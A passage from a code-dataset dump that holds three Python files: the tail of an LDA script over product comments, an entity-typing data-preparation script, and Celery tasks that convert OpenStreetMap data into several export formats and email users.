dianpu_info[shop_name]=[]\n dianpu_info[shop_name].extend(product_id)\n\n path='C:/Users/Administrator/Desktop/data/评论/comment_info_cup_final.csv'\n df_data=pd.read_csv(path,engine='python')\n oo=df_data['referenceId'].value_counts()\n pp=oo[oo>=300].index.tolist()\n corpus_dianpu={}\n for dianpu,product_id_list in dianpu_info.items():\n for product_id in product_id_list:\n if product_id in pp:\n ui = df_data[df_data['referenceId'] == product_id]['comment'].values.tolist()\n else:\n continue\n if dianpu not in corpus_dianpu.keys():\n corpus_dianpu[dianpu]=[]\n corpus_dianpu[dianpu].append(ui)\n \n", "sub_path": "论文/ldamodel_sent.py", "file_name": "ldamodel_sent.py", "file_ext": "py", "file_size_in_byte": 37430, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "sys.path.append", "line_number": 3, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 3, "usage_type": "attribute"}, {"api_name": "numpy.random.dirichlet", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 122, "usage_type": "attribute"}, {"api_name": "numpy.full", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.full", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.full", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 129, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 130, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.full", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.full", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 158, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 160, "usage_type": "call"}, {"api_name": "scipy.sparse.coo_matrix", "line_number": 161, "usage_type": "call"}, {"api_name": "scipy.sparse.coo_matrix", "line_number": 162, "usage_type": "call"}, {"api_name": "scipy.sparse.coo_matrix", "line_number": 163, "usage_type": "call"}, {"api_name": "scipy.sparse.coo_matrix", "line_number": 164, "usage_type": "call"}, {"api_name": "scipy.sparse.coo_matrix", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 167, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 170, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 172, "usage_type": "call"}, {"api_name": "scipy.sparse.coo_matrix", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.int8", "line_number": 176, "usage_type": "attribute"}, {"api_name": "scipy.sparse.coo_matrix", "line_number": 177, "usage_type": "call"}, {"api_name": "numpy.int8", "line_number": 177, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.random.multinomial", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 352, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 355, "usage_type": "call"}, {"api_name": "random.random", "line_number": 376, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 384, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 385, "usage_type": "call"}, {"api_name": "prettytable.PrettyTable", "line_number": 431, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 436, "usage_type": "call"}, {"api_name": "prettytable.PrettyTable", "line_number": 448, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 451, "usage_type": "call"}, {"api_name": "prettytable.PrettyTable", "line_number": 468, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 472, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 497, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 498, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 499, "usage_type": "call"}, {"api_name": "prettytable.PrettyTable", "line_number": 517, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 520, "usage_type": "call"}, {"api_name": "numpy.log2", "line_number": 558, "usage_type": "call"}, {"api_name": "prettytable.PrettyTable", "line_number": 565, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 567, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 576, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 576, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 578, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 578, "usage_type": "name"}, {"api_name": "time.time", "line_number": 584, "usage_type": "call"}, {"api_name": "time.time", "line_number": 588, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 599, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 608, "usage_type": "call"}, {"api_name": "time.time", "line_number": 627, "usage_type": "call"}, {"api_name": "prettytable.PrettyTable", "line_number": 693, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 700, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 718, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 733, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 734, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 735, "usage_type": "call"}, {"api_name": "gensim.corpora.Dictionary", "line_number": 745, "usage_type": "call"}, {"api_name": "gensim.corpora", "line_number": 745, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 771, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 785, "usage_type": "call"}, {"api_name": "sklearn.decomposition.PCA", "line_number": 803, "usage_type": "call"}, {"api_name": "scipy.cluster.hierarchy.distance.pdist", "line_number": 806, "usage_type": "call"}, {"api_name": "scipy.cluster.hierarchy.distance", "line_number": 806, "usage_type": "attribute"}, {"api_name": "scipy.cluster.hierarchy", "line_number": 806, "usage_type": "name"}, {"api_name": "scipy.cluster.hierarchy.linkage", "line_number": 807, "usage_type": "call"}, {"api_name": "scipy.cluster.hierarchy.dendrogram", "line_number": 808, "usage_type": "call"}, {"api_name": "scipy.cluster.hierarchy", "line_number": 808, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 809, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 809, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 810, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 810, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 811, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 811, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 812, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 812, "usage_type": "name"}, {"api_name": "scipy.cluster.hierarchy.fcluster", "line_number": 815, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 821, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 826, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 834, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 834, "usage_type": "name"}, {"api_name": "scipy.sparse.coo_matrix", "line_number": 839, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 840, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 852, "usage_type": "call"}, {"api_name": "prettytable.PrettyTable", "line_number": 860, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 867, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 880, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 885, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 899, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 900, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 901, "usage_type": "call"}, {"api_name": "gensim.corpora.Dictionary", "line_number": 911, "usage_type": "call"}, {"api_name": "gensim.corpora", "line_number": 911, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 937, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 951, "usage_type": "call"}]}
+{"seq_id": "246328843", "text": "import json\r\n\r\nimport time\r\nimport argparse\r\nfrom tqdm import tqdm\r\n\r\n\r\ndef prepare_train_data(file_input='./data/crowd/train.json', file_output='./data/processed/train.txt'):\r\n '''\r\n @param file_input (str): input filename\r\n @param file_output (str): output text file, model inputs\r\n '''\r\n f_in = open(file_input, 'r', encoding='utf-8')\r\n f_out = open(file_output, 'w', encoding='utf-8')\r\n sentence_left = []\r\n mention = []\r\n sentence_right = []\r\n text_output = []\r\n for i, line in tqdm(enumerate(f_in)):\r\n x = json.loads(line)\r\n sentence = ''\r\n y_list = x.get('y_str', None)\r\n sentence_left = x.get('left_context_token', None)\r\n mention = x.get('mention_span', None)\r\n sentence_right = x.get('right_context_token', None)\r\n if y_list is not None:\r\n for word in y_list:\r\n sentence += word + ' '\r\n sentence = sentence[:-1]\r\n sentence = sentence + '\\t'\r\n for word in sentence_left:\r\n sentence += word + ' '\r\n sentence += mention\r\n for word in sentence_right:\r\n sentence += word + ' '\r\n sentence += '[SEP] '\r\n sentence += mention + '\\n'\r\n text_output.append(sentence)\r\n\r\n for line in text_output:\r\n f_out.writelines(line)\r\n f_in.close()\r\n f_out.close()\r\n\r\n\r\n# create 6 different patterns of masked data\r\ndef prepare_masked_data(file_input='./data/crowd/train.json', file_output='./data/processed/train.txt'):\r\n '''\r\n @param file_input (str): input filename\r\n @param file_output (str): output text file, model inputs\r\n '''\r\n\r\n f_in = open(file_input, 'r', encoding='utf-8')\r\n sentence_left = []\r\n mention = []\r\n sentence_right = []\r\n text_output = []\r\n patterns = [\r\n 'and any other [MASK] ',\r\n # 'and some other [MASK] ',\r\n # '[MASK] such as ',\r\n # 'such [MASK] as ',\r\n # '[MASK] including ',\r\n # '[MASK] especially '\r\n ]\r\n f_out = []\r\n iter = len(patterns)\r\n for i in range(iter):\r\n f_out.append(open(file_output + '.' + 'pattern_' + str(i), 'w', encoding='utf-8'))\r\n\r\n for i, line in tqdm(enumerate(f_in)):\r\n x = json.loads(line)\r\n y_list = x.get('y_str', None)\r\n sentence_left = x.get('left_context_token', None)\r\n mention = x.get('mention_span', None)\r\n sentence_right = x.get('right_context_token', None)\r\n # write\r\n for p in range(iter):\r\n sentence = ''\r\n if y_list is not None:\r\n for word in y_list:\r\n sentence += word + ' '\r\n sentence = sentence[:-1]\r\n sentence = sentence + '\\t'\r\n for word in sentence_left:\r\n sentence += word + ' '\r\n if p == 0 or p == 1:\r\n sentence += mention + ' '\r\n sentence += patterns[p]\r\n else:\r\n sentence += patterns[p]\r\n sentence += mention + ' '\r\n for word in sentence_right:\r\n sentence += word + ' '\r\n sentence = sentence[:-1]\r\n sentence += '\\n'\r\n f_out[p].writelines(sentence)\r\n\r\n for i in range(iter):\r\n f_out[i].close()\r\n f_in.close()\r\n\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser(description='Arguments for preparing data.')\r\n parser.add_argument('-i', type=str, default='./data/distant.json', help='input file')\r\n parser.add_argument('-o', type=str, default='./data/train_distant.txt', help='output file')\r\n parser.add_argument('-m', type=int, default=0,\r\n help='generation mode: 0 - for training data; 1 - for masked training data')\r\n args = parser.parse_args()\r\n print('Reformatting data...')\r\n start = time.time()\r\n if args.m != '':\r\n if args.m == 0:\r\n prepare_train_data(args.i, args.o)\r\n elif args.m == 1:\r\n prepare_masked_data(args.i, args.o)\r\n else:\r\n print('Arg error.')\r\n else:\r\n print('Arg error.')\r\n\r\n # debug\r\n # prepare_data('./data/crowd/dev.json', './data/processed/dev.txt')\r\n # prepare_masked_data('./data/crowd/dev.json', './data/processed/dev.txt')\r\n\r\n end = time.time()\r\n print('Loading finished:\\t', end - start)", "sub_path": "examples/prepare_data.py", "file_name": "prepare_data.py", "file_ext": "py", "file_size_in_byte": 4421, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "tqdm.tqdm", "line_number": 19, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 20, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 71, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 72, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 105, "usage_type": "call"}, {"api_name": "time.time", "line_number": 112, "usage_type": "call"}, {"api_name": "time.time", "line_number": 127, "usage_type": "call"}]}
+{"seq_id": "253244507", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\n\nimport cPickle\nimport os\nimport shutil\n\nfrom django.conf import settings\nfrom django.core.files.base import ContentFile\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.db import DatabaseError\nfrom django.template import Context\nfrom django.template.loader import get_template\nfrom django.utils import timezone\n\nfrom celery import Task\nfrom celery.utils.log import get_task_logger\n\nfrom jobs.presets import TagParser\nfrom utils import (\n garmin, kml, osmand, osmconf, osmparse, overpass, pbf, shp, thematic_shp\n)\n\n# Get an instance of a logger\nlogger = get_task_logger(__name__)\n\n\n# ExportTask abstract base class and subclasses.\n\nclass ExportTask(Task):\n \"\"\"\n Abstract base class for export tasks.\n \"\"\"\n\n # whether to abort the whole run if this task fails.\n abort_on_error = False\n\n class Meta:\n abstract = True\n\n def on_success(self, retval, task_id, args, kwargs):\n \"\"\"\n Update the successfuly completed task as follows:\n\n 1. update the time the task completed\n 2. caclulate the size of the output file\n 3. calculate the download path of the export\n 4. create the export download directory\n 5. copy the export file to the download directory\n 6. create the export task result\n 7. update the export task status and save it\n \"\"\"\n from tasks.models import ExportTask, ExportTaskResult\n # update the task\n finished = timezone.now()\n task = ExportTask.objects.get(celery_uid=task_id)\n task.finished_at = finished\n # get the output\n output_url = retval['result']\n stat = os.stat(output_url)\n size = stat.st_size / 1024 / 1024.00\n # construct the download_path\n download_root = settings.EXPORT_DOWNLOAD_ROOT\n parts = output_url.split('/')\n filename = parts[-1]\n run_uid = parts[-2]\n run_dir = '{0}{1}'.format(download_root, run_uid)\n download_path = '{0}{1}/{2}'.format(download_root, run_uid, filename)\n try:\n if not os.path.exists(run_dir):\n os.makedirs(run_dir)\n # don't copy raw overpass data\n if (task.name != 'OverpassQuery'):\n shutil.copy(output_url, download_path)\n except IOError as e:\n logger.error('Error copying output file to: {0}'.format(download_path))\n # construct the download url\n download_media_root = settings.EXPORT_MEDIA_ROOT\n download_url = '{0}{1}/{2}'.format(download_media_root, run_uid, filename)\n # save the task and task result\n result = ExportTaskResult(\n task=task,\n filename=filename,\n size=size,\n download_url=download_url\n )\n result.save()\n task.status = 'SUCCESS'\n task.save()\n\n def on_failure(self, exc, task_id, args, kwargs, einfo):\n \"\"\"\n Update the failed task as follows:\n\n 1. pull out the ExportTask\n 2. update the task status and finish time\n 3. create an export task exception\n 4. save the export task with the task exception\n 5. run ExportTaskErrorHandler if the run should be aborted\n - this is only for initial tasks on which subsequent export tasks depend\n \"\"\"\n from tasks.models import ExportTask, ExportTaskException, ExportRun\n logger.debug('Task name: {0} failed, {1}'.format(self.name, einfo))\n task = ExportTask.objects.get(celery_uid=task_id)\n task.status = 'FAILED'\n task.finished_at = timezone.now()\n task.save()\n exception = cPickle.dumps(einfo)\n ete = ExportTaskException(task=task, exception=exception)\n ete.save()\n if self.abort_on_error:\n run = ExportRun.objects.get(tasks__celery_uid=task_id)\n run.status = 'FAILED'\n run.finished_at = timezone.now()\n run.save()\n error_handler = ExportTaskErrorHandler()\n # run error handler\n stage_dir = kwargs['stage_dir']\n error_handler.si(run_uid=str(run.uid), task_id=task_id, stage_dir=stage_dir).delay()\n\n def after_return(self, *args, **kwargs):\n logger.debug('Task returned: {0}'.format(self.request))\n\n def update_task_state(self, run_uid=None, name=None):\n \"\"\"\n Update the task state and celery task uid.\n Can use the celery uid for diagnostics.\n \"\"\"\n started = timezone.now()\n from tasks.models import ExportTask\n celery_uid = self.request.id\n try:\n task = ExportTask.objects.get(run__uid=run_uid, name=name)\n celery_uid = self.request.id\n task.celery_uid = celery_uid\n task.status = 'RUNNING'\n task.started_at = started\n task.save()\n logger.debug('Updated task: {0} with uid: {1}'.format(task.name, task.uid))\n except DatabaseError as e:\n logger.error('Updating task {0} state throws: {1}'.format(task.name, e))\n raise e\n\n\nclass OSMConfTask(ExportTask):\n \"\"\"\n Task to create the ogr2ogr conf file.\n \"\"\"\n name = 'OSMConf'\n abort_on_error = True\n\n def run(self, run_uid=None, categories=None, stage_dir=None, job_name=None):\n self.update_task_state(run_uid=run_uid, name=self.name)\n conf = osmconf.OSMConfig(categories, job_name=job_name)\n configfile = conf.create_osm_conf(stage_dir=stage_dir)\n return {'result': configfile}\n\n\nclass OverpassQueryTask(ExportTask):\n \"\"\"\n Class to run an overpass query.\n \"\"\"\n name = 'OverpassQuery'\n abort_on_error = True\n\n def run(self, run_uid=None, stage_dir=None, job_name=None, filters=None, bbox=None):\n \"\"\"\n Runs the query and returns the path to the filtered osm file.\n \"\"\"\n self.update_task_state(run_uid=run_uid, name=self.name)\n op = overpass.Overpass(\n bbox=bbox, stage_dir=stage_dir,\n job_name=job_name, filters=filters\n )\n op.run_query() # run the query\n filtered_osm = op.filter() # filter the results\n return {'result': filtered_osm}\n\n\nclass OSMToPBFConvertTask(ExportTask):\n \"\"\"\n Task to convert osm to pbf format.\n Returns the path to the pbf file.\n \"\"\"\n name = 'OSM2PBF'\n abort_on_error = True\n\n def run(self, run_uid=None, stage_dir=None, job_name=None):\n self.update_task_state(run_uid=run_uid, name=self.name)\n osm = stage_dir + job_name + '.osm'\n pbffile = stage_dir + job_name + '.pbf'\n o2p = pbf.OSMToPBF(osm=osm, pbffile=pbffile)\n pbffile = o2p.convert()\n return {'result': pbffile}\n\n\nclass OSMPrepSchemaTask(ExportTask):\n \"\"\"\n Task to create the default sqlite schema.\n \"\"\"\n name = 'OSMSchema'\n abort_on_error = True\n\n def run(self, run_uid=None, stage_dir=None, job_name=None):\n self.update_task_state(run_uid=run_uid, name=self.name)\n osm = stage_dir + job_name + '.pbf'\n sqlite = stage_dir + job_name + '.sqlite'\n osmconf = stage_dir + job_name + '.ini'\n osmparser = osmparse.OSMParser(osm=osm, sqlite=sqlite, osmconf=osmconf)\n osmparser.create_spatialite()\n osmparser.create_default_schema()\n osmparser.update_zindexes()\n return {'result': sqlite}\n\n\nclass ThematicLayersExportTask(ExportTask):\n \"\"\"\n Task to export thematic shapefile.\n \"\"\"\n\n name = \"Thematic Shapefile Export\"\n\n def run(self, run_uid=None, stage_dir=None, job_name=None):\n from tasks.models import ExportRun\n self.update_task_state(run_uid=run_uid, name=self.name)\n run = ExportRun.objects.get(uid=run_uid)\n tags = run.job.categorised_tags\n sqlite = stage_dir + job_name + '.sqlite'\n try:\n t2s = thematic_shp.ThematicSQliteToShp(sqlite=sqlite, tags=tags, job_name=job_name)\n t2s.generate_thematic_schema()\n out = t2s.convert()\n return {'result': out}\n except Exception as e:\n logger.error('Raised exception in thematic task, %s', str(e))\n raise Exception(e) # hand off to celery..\n\n\nclass ShpExportTask(ExportTask):\n \"\"\"\n Class defining SHP export function.\n \"\"\"\n name = 'Default Shapefile Export'\n\n def run(self, run_uid=None, stage_dir=None, job_name=None):\n self.update_task_state(run_uid=run_uid, name=self.name)\n sqlite = stage_dir + job_name + '.sqlite'\n shapefile = stage_dir + job_name + '_shp'\n try:\n s2s = shp.SQliteToShp(sqlite=sqlite, shapefile=shapefile)\n out = s2s.convert()\n return {'result': out}\n except Exception as e:\n logger.error('Raised exception in shapefile export, %s', str(e))\n raise Exception(e)\n\n\nclass KmlExportTask(ExportTask):\n \"\"\"\n Class defining KML export function.\n \"\"\"\n name = 'KML Export'\n\n def run(self, run_uid=None, stage_dir=None, job_name=None):\n self.update_task_state(run_uid=run_uid, name=self.name)\n sqlite = stage_dir + job_name + '.sqlite'\n kmlfile = stage_dir + job_name + '.kml'\n try:\n s2k = kml.SQliteToKml(sqlite=sqlite, kmlfile=kmlfile)\n out = s2k.convert()\n return {'result': out}\n except Exception as e:\n logger.error('Raised exception in kml export, %s', str(e))\n raise Exception(e)\n\n\nclass ObfExportTask(ExportTask):\n \"\"\"\n Class defining OBF export function.\n \"\"\"\n name = 'OBF Export'\n\n def run(self, run_uid=None, stage_dir=None, job_name=None):\n self.update_task_state(run_uid=run_uid, name=self.name)\n pbffile = stage_dir + job_name + '.pbf'\n map_creator_dir = settings.OSMAND_MAP_CREATOR_DIR\n work_dir = stage_dir + 'osmand'\n try:\n o2o = osmand.OSMToOBF(\n pbffile=pbffile, work_dir=work_dir, map_creator_dir=map_creator_dir\n )\n out = o2o.convert()\n obffile = stage_dir + job_name + '.obf'\n shutil.move(out, obffile)\n shutil.rmtree(work_dir)\n return {'result': obffile}\n except Exception as e:\n logger.error('Raised exception in obf export, %s', str(e))\n raise Exception(e)\n\n\nclass SqliteExportTask(ExportTask):\n \"\"\"\n Class defining SQLITE export function.\n \"\"\"\n\n name = 'SQLITE Export'\n\n def run(self, run_uid=None, stage_dir=None, job_name=None):\n self.update_task_state(run_uid=run_uid, name=self.name)\n # sqlite already generated by OSMPrepSchema so just return path.\n sqlite = stage_dir + job_name + '.sqlite'\n return {'result': sqlite}\n\n\nclass GarminExportTask(ExportTask):\n \"\"\"\n Class defining GARMIN export function.\n \"\"\"\n\n name = 'Garmin Export'\n _region = '' # set by the task_runner\n\n @property\n def region(self,):\n return self._region\n\n @region.setter\n def region(self, value):\n self._region = value\n\n def run(self, run_uid=None, stage_dir=None, job_name=None):\n self.update_task_state(run_uid=run_uid, name=self.name)\n work_dir = stage_dir + 'garmin'\n config = settings.GARMIN_CONFIG # get path to garmin config\n pbffile = stage_dir + job_name + '.pbf'\n try:\n o2i = garmin.OSMToIMG(\n pbffile=pbffile, work_dir=work_dir,\n config=config, region=None, debug=False\n )\n o2i.run_splitter()\n out = o2i.run_mkgmap()\n imgfile = stage_dir + job_name + '_garmin.zip'\n shutil.move(out, imgfile)\n shutil.rmtree(work_dir)\n return {'result': imgfile}\n except Exception as e:\n logger.error('Raised exception in garmin export, %s', str(e))\n raise Exception(e)\n\n\nclass GeneratePresetTask(ExportTask):\n \"\"\"\n Generates a JOSM Preset from the exports selected features.\n \"\"\"\n\n name = 'Generate Preset'\n\n def run(self, run_uid=None, stage_dir=None, job_name=None):\n from tasks.models import ExportRun\n from jobs.models import ExportConfig\n self.update_task_state(run_uid=run_uid, name=self.name)\n run = ExportRun.objects.get(uid=run_uid)\n job = run.job\n user = job.user\n feature_save = job.feature_save\n feature_pub = job.feature_pub\n # check if we should create a josm preset\n if feature_save or feature_pub:\n tags = job.tags.all()\n tag_parser = TagParser(tags=tags)\n xml = tag_parser.parse_tags()\n preset_file = ContentFile(xml)\n name = job.name\n filename = job_name + '_preset.xml'\n content_type = 'application/xml'\n config = ExportConfig.objects.create(\n name=name, filename=filename,\n config_type='PRESET', content_type=content_type,\n user=user, published=feature_pub\n )\n config.upload.save(filename, preset_file)\n\n output_path = config.upload.path\n job.configs.clear()\n job.configs.add(config)\n return {'result': output_path}\n\n\nclass FinalizeRunTask(Task):\n \"\"\"\n Finalizes export run.\n\n Cleans up staging directory.\n Updates run with finish time.\n Emails user notification.\n \"\"\"\n\n name = 'Finalize Export Run'\n\n def run(self, run_uid=None, stage_dir=None):\n from tasks.models import ExportRun\n run = ExportRun.objects.get(uid=run_uid)\n run.status = 'COMPLETED'\n tasks = run.tasks.all()\n # mark run as incomplete if any tasks fail\n for task in tasks:\n if task.status == 'FAILED':\n run.status = 'INCOMPLETE'\n finished = timezone.now()\n run.finished_at = finished\n run.save()\n try:\n shutil.rmtree(stage_dir)\n except IOError as e:\n logger.error('Error removing {0} during export finalize'.format(stage_dir))\n\n # send notification email to user\n hostname = settings.HOSTNAME\n url = 'http://{0}/exports/{1}'.format(hostname, run.job.uid)\n addr = run.user.email\n subject = \"Your HOT Export is ready\"\n to = [addr]\n from_email = 'HOT Exports '\n ctx = {\n 'url': url,\n 'status': run.status\n }\n text = get_template('email/email.txt').render(Context(ctx))\n html = get_template('email/email.html').render(Context(ctx))\n msg = EmailMultiAlternatives(subject, text, to=to, from_email=from_email)\n msg.attach_alternative(html, \"text/html\")\n msg.send()\n\n\nclass ExportTaskErrorHandler(Task):\n \"\"\"\n Handles un-recoverable errors in export tasks.\n \"\"\"\n\n name = \"Export Task Error Handler\"\n\n def run(self, run_uid, task_id=None, stage_dir=None):\n from tasks.models import ExportRun\n finished = timezone.now()\n run = ExportRun.objects.get(uid=run_uid)\n run.finished_at = finished\n run.status = 'FAILED'\n run.save()\n try:\n if os.path.isdir(stage_dir):\n #leave the stage_dir in place for debugging\n #shutil.rmtree(stage_dir)\n pass\n except IOError as e:\n logger.error('Error removing {0} during export finalize'.format(stage_dir))\n hostname = settings.HOSTNAME\n url = 'http://{0}/exports/{1}'.format(hostname, run.job.uid)\n addr = run.user.email\n subject = \"Your HOT Export Failed\"\n # email user and administrator\n to = [addr, settings.TASK_ERROR_EMAIL]\n from_email = 'HOT Exports '\n ctx = {\n 'url': url,\n 'task_id': task_id\n }\n text = get_template('email/error_email.txt').render(Context(ctx))\n html = get_template('email/error_email.html').render(Context(ctx))\n msg = EmailMultiAlternatives(subject, text, to=to, from_email=from_email)\n msg.attach_alternative(html, \"text/html\")\n msg.send()\n", "sub_path": "tasks/export_tasks.py", "file_name": "export_tasks.py", "file_ext": "py", "file_size_in_byte": 16227, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "celery.utils.log.get_task_logger", "line_number": 25, "usage_type": "call"}, {"api_name": "celery.Task", "line_number": 30, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 55, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 55, "usage_type": "name"}, {"api_name": "tasks.models.ExportTask.objects.get", "line_number": 56, "usage_type": "call"}, {"api_name": "tasks.models.ExportTask.objects", "line_number": 56, "usage_type": "attribute"}, {"api_name": "tasks.models.ExportTask", "line_number": 56, "usage_type": "name"}, {"api_name": "os.stat", "line_number": 60, "usage_type": "call"}, {"api_name": "django.conf.settings.EXPORT_DOWNLOAD_ROOT", "line_number": 63, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 63, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 71, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 74, "usage_type": "call"}, {"api_name": "django.conf.settings.EXPORT_MEDIA_ROOT", "line_number": 78, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 78, "usage_type": "name"}, {"api_name": "tasks.models.ExportTaskResult", "line_number": 81, "usage_type": "call"}, {"api_name": "tasks.models.ExportTask.objects.get", "line_number": 104, "usage_type": "call"}, {"api_name": "tasks.models.ExportTask.objects", "line_number": 104, "usage_type": "attribute"}, {"api_name": "tasks.models.ExportTask", "line_number": 104, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 106, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 106, "usage_type": "name"}, {"api_name": "cPickle.dumps", "line_number": 108, "usage_type": "call"}, {"api_name": "tasks.models.ExportTaskException", "line_number": 109, "usage_type": "call"}, {"api_name": "tasks.models.ExportRun.objects.get", "line_number": 112, "usage_type": "call"}, {"api_name": "tasks.models.ExportRun.objects", "line_number": 112, "usage_type": "attribute"}, {"api_name": "tasks.models.ExportRun", "line_number": 112, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 114, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 114, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 129, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 129, "usage_type": "name"}, {"api_name": "tasks.models.ExportTask.objects.get", "line_number": 133, "usage_type": "call"}, {"api_name": "tasks.models.ExportTask.objects", "line_number": 133, "usage_type": "attribute"}, {"api_name": "tasks.models.ExportTask", "line_number": 133, "usage_type": "name"}, {"api_name": "django.db.DatabaseError", "line_number": 140, "usage_type": "name"}, {"api_name": "utils.osmconf.OSMConfig", "line_number": 154, "usage_type": "call"}, {"api_name": "utils.osmconf", "line_number": 154, "usage_type": "name"}, {"api_name": "utils.overpass.Overpass", "line_number": 171, "usage_type": "call"}, {"api_name": "utils.overpass", "line_number": 171, "usage_type": "name"}, {"api_name": "utils.pbf.OSMToPBF", "line_number": 192, "usage_type": "call"}, {"api_name": "utils.pbf", "line_number": 192, "usage_type": "name"}, {"api_name": "utils.osmconf", "line_number": 208, "usage_type": "name"}, {"api_name": "utils.osmparse.OSMParser", "line_number": 209, "usage_type": "call"}, {"api_name": "utils.osmparse", "line_number": 209, "usage_type": "name"}, {"api_name": "utils.osmconf", "line_number": 209, "usage_type": "name"}, {"api_name": "tasks.models.ExportRun.objects.get", "line_number": 226, "usage_type": "call"}, {"api_name": "tasks.models.ExportRun.objects", "line_number": 226, "usage_type": "attribute"}, {"api_name": "tasks.models.ExportRun", "line_number": 226, "usage_type": "name"}, {"api_name": "utils.thematic_shp.ThematicSQliteToShp", "line_number": 230, "usage_type": "call"}, {"api_name": "utils.thematic_shp", "line_number": 230, "usage_type": "name"}, 